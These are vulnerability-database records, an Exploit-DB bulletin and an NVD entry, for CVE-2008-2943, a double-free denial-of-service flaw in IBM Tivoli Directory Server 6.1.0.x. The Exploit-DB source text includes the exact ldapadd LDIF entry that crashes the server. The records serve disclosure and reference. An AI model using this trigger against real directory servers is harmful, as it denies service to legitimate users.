{"id": "EDB-ID:31999", "hash": "967a8937bea140bc53d402387998e44e", "type": "exploitdb", "bulletinFamily": "exploit", "title": "IBM Tivoli Directory Server 6.1.x Adding 'ibm-globalAdminGroup' Entry Denial of Service Vulnerability", "description": "IBM Tivoli Directory Server 6.1.x Adding 'ibm-globalAdminGroup' Entry Denial of Service Vulnerability. CVE-2008-2943. Dos exploits for multiple platform", "published": "2008-06-30T00:00:00", "modified": "2008-06-30T00:00:00", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/31999/", "reporter": "anonymous", "references": [], "cvelist": ["CVE-2008-2943"], "lastseen": "2016-02-03T15:57:24", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "vulnersScore": 5.0}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/31999/", "sourceData": "source: http://www.securityfocus.com/bid/30010/info\r\n\r\nIBM Tivoli Directory Server is prone to a denial-of-service vulnerability because the server contains a double-free error.\r\n\r\nAn attacker can exploit this issue to crash the affected server with a SIGSEGV fault, denying service to legitimate users.\r\n\r\nTivoli Directory Server 6.1.0.0 - 6.1.0.15 are affected. \r\n\r\nThe following 'ldapadd' entry is sufficient to trigger the issue:\r\n\r\ndn: globalGroupName=GlobalAdminGroup,cn=ibmpolicies\r\nglobalGroupName: GlobalAdminGroup\r\nobjectclass: top\r\nobjectclass: ibm-globalAdminGroup ", "osvdbidlist": ["46577"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}

{"cve": [{"lastseen": "2017-08-08T11:24:45", "references": ["http://www.securityfocus.com/bid/30010", "http://www-1.ibm.com/support/docview.wss?uid=swg1IO09113", "http://www.vupen.com/english/advisories/2008/1970", "https://exchange.xforce.ibmcloud.com/vulnerabilities/43465"], "description": "Double free vulnerability in IBM Tivoli Directory Server (TDS) 6.1.0.0 through 6.1.0.15 allows remote authenticated administrators to cause a denial of service (ABEND) and possibly execute arbitrary code by using ldapadd to attempt to create a duplicate ibm-globalAdminGroup LDAP database entry. NOTE: the vendor states \"There is no real risk of a vulnerability,\" although there are likely scenarios in which a user is allowed to make administrative LDAP requests but does not have the privileges to stop the server.", "edition": 2, "reporter": "NVD", "published": "2008-06-30T17:41:00", "title": "CVE-2008-2943", "type": "cve", "enchantments": {"score": {"modified": "2017-08-08T11:24:45", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2008-2943"], "scanner": [], "modified": "2017-08-07T21:31:27", "cpe": ["cpe:/a:ibm:tivoli_directory_server:6.1.0.2", "cpe:/a:ibm:tivoli_directory_server:6.1.0.4", "cpe:/a:ibm:tivoli_directory_server:6.1.0.5", "cpe:/a:ibm:tivoli_directory_server:6.1.0.13", "cpe:/a:ibm:tivoli_directory_server:6.1.0.9", "cpe:/a:ibm:tivoli_directory_server:6.1.0.11", "cpe:/a:ibm:tivoli_directory_server:6.1.0.10", "cpe:/a:ibm:tivoli_directory_server:6.1.0.6", "cpe:/a:ibm:tivoli_directory_server:6.1.0.15", "cpe:/a:ibm:tivoli_directory_server:6.1.0.7", "cpe:/a:ibm:tivoli_directory_server:6.1.0.1", "cpe:/a:ibm:tivoli_directory_server:6.1.0.3", "cpe:/a:ibm:tivoli_directory_server:6.1.0.8", "cpe:/a:ibm:tivoli_directory_server:6.1.0.12", "cpe:/a:ibm:tivoli_directory_server:6.1.0.0", "cpe:/a:ibm:tivoli_directory_server:6.1.0.14"], "id": "CVE-2008-2943", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2943", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}